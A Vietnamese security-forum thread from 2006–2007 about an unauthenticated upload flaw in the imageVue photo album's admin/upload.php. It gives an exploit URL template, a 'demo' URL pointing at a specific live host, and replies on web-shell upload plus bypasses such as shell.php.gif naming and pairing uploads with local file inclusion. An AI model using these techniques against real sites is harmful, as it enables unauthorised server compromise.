English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits upload ko kiểm tra session ở imageVue subversion (All version)  XML
  [Announcement]   upload ko kiểm tra session ở imageVue subversion (All version) 23/08/2006 19:23:33 (+0700) | #1 | 17271
[Avatar]
 buicathung
Elite Member
[Minus]    0    [Plus]
Joined: 21/09/2004 01:17:00
Messages: 53
Location: Địa Ngục
Offline
[Profile] [PM] [Yahoo!] [MSN]
Bạn có thể download imageVue ở đây để test : www.imagevuex.com
smilie Lỗi ở các phiên bản là cho phép bạn upload thỏa mái mà không phải chịu bất kì kiểm tra nào ...

Code:
http://[target]/imageVue/admin/upload.php?path=[directory]

Demo :

Code:
http://imagevuex.inn.no/imagevue/admin/upload.php?path=[directory]
[Up] [Print Copy]
  [Question]   upload ko kiểm tra session ở imageVue subversion (All version) 03/09/2006 05:16:22 (+0700) | #2 | 20223
[Avatar]
 lonely_Xorhandsome
Elite Member
[Minus]    0    [Plus]
Joined: 26/06/2006 12:14:07
Messages: 558
Location: HCM beside you !
Offline
[Profile] [PM]

buicathung wrote:
Bạn có thể download imageVue ở đây để test : www.imagevuex.com
smilie Lỗi ở các phiên bản là cho phép bạn upload thỏa mái mà không phải chịu bất kì kiểm tra nào ...

Code:
http://[target]/imageVue/admin/upload.php?path=[directory]

Demo :

Code:
http://imagevuex.inn.no/imagevue/admin/upload.php?path=[directory]

 

loại forum này trước đây em cũng có up shell qua rồi nhưng khi thực thị nó thì bị 1 file trung gian image.php nó xử lý .... xử lý làm sao toàn ra code không !! em nhớ là đã hỏi mấy anh trong HVA thì có người bão server config kỹ ... nếu có lỗi thì không tới lượt em hack ....ect..ect smilie) ,rốt cục anh cũng post cái nội dung này lên rồi , vị nào trã lời topic trước đây của em nghĩ sao nhỉ smilie
[Up] [Print Copy]
  [Question]   upload ko kiểm tra session ở imageVue subversion (All version) 03/09/2006 23:05:06 (+0700) | #3 | 20355
[Avatar]
 buicathung
Elite Member
[Minus]    0    [Plus]
Joined: 21/09/2004 01:17:00
Messages: 53
Location: Địa Ngục
Offline
[Profile] [PM] [Yahoo!] [MSN]

lonely_Xorhandsome wrote:

buicathung wrote:
Bạn có thể download imageVue ở đây để test : www.imagevuex.com
smilie Lỗi ở các phiên bản là cho phép bạn upload thỏa mái mà không phải chịu bất kì kiểm tra nào ...

Code:
http://[target]/imageVue/admin/upload.php?path=[directory]

Demo :

Code:
http://imagevuex.inn.no/imagevue/admin/upload.php?path=[directory]

 

loại forum này trước đây em cũng có up shell qua rồi nhưng khi thực thị nó thì bị 1 file trung gian image.php nó xử lý .... xử lý làm sao toàn ra code không !! em nhớ là đã hỏi mấy anh trong HVA thì có người bão server config kỹ ... nếu có lỗi thì không tới lượt em hack ....ect..ect smilie) ,rốt cục anh cũng post cái nội dung này lên rồi , vị nào trã lời topic trước đây của em nghĩ sao nhỉ smilie  


Mình xin trả lời bạn một số vấn đề:
- Trong imageVue ko hề có một file nào để xử lý image.php và lỗi này cũng hoàn toàn ko liên quan tới 1 file nào có tên là image.php
- Đây là mã nguồn của Album chứ ko phải là 4rum
Bạn có thể download bản mình test ở đây để biết thêm chi tiết

http://hosting-jazz.com/share/imageVu.rar
 

Password unrar:yhp
[Up] [Print Copy]
  [Question]   upload ko kiểm tra session ở imageVue subversion (All version) 04/09/2006 15:21:30 (+0700) | #4 | 20545
[Avatar]
 lonely_Xorhandsome
Elite Member
[Minus]    0    [Plus]
Joined: 26/06/2006 12:14:07
Messages: 558
Location: HCM beside you !
Offline
[Profile] [PM]
em cũng chưa test qua topic của anh nhưng em cũng thử ở 1 số forum cho up cả shell lên ( bất kỳ file nào dưới X kb)nhưng khi truy cập shell thì bị file image.php xử lý và view ra code không !
[Up] [Print Copy]
  [Question]   upload ko kiểm tra session ở imageVue subversion (All version) 05/09/2006 22:22:16 (+0700) | #5 | 20828
[Avatar]
 buicathung
Elite Member
[Minus]    0    [Plus]
Joined: 21/09/2004 01:17:00
Messages: 53
Location: Địa Ngục
Offline
[Profile] [PM] [Yahoo!] [MSN]

lonely_Xorhandsome wrote:
em cũng chưa test qua topic của anh nhưng em cũng thử ở 1 số forum cho up cả shell lên ( bất kỳ file nào dưới X kb)nhưng khi truy cập shell thì bị file image.php xử lý và view ra code không !  

smilie Tuỳ từng loại mã nguồn bạn ạ. Mỗi loại mà nguồn sẽ có một cách xử lý các file upload khác nhau. VD như IBF bạn có thể upload file PHP lên nhưng nó sẽ được lưu dưới dạng khác và khi bạn download nó sẽ có một quá trình sử lí ngược lại để bạn được file như ban đầu bạn upload lên.
Nhưng với một số loại khác thì bạn có thể upload file nên với nguyên dạng ban đầu của nó giống như file khi bạn upload lên.
Để chính xác thì bạn nên download mã nguồn của từng loại về test ( nếu có thể ) như vậy bạn sẽ hiểu rõ hơn.
[Up] [Print Copy]
  [Question]   upload ko kiểm tra session ở imageVue subversion (All version) 04/02/2007 04:07:52 (+0700) | #6 | 39834
HoS
Member
[Minus]    0    [Plus]
Joined: 03/02/2007 15:07:38
Messages: 43
Offline
[Profile] [PM]
Hoặc cũng có thể đổi tên một chút ví dụ như : shell.php.gif ... nếu Server dùng Apache cũ. Thậm chí nếu nó check file kĩ thì nếu như có thể local include file thì up file image, txt... vẫn nguy hiểm mà cái này có nhiêu source bị dính như phpbb chẳng hạn.
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|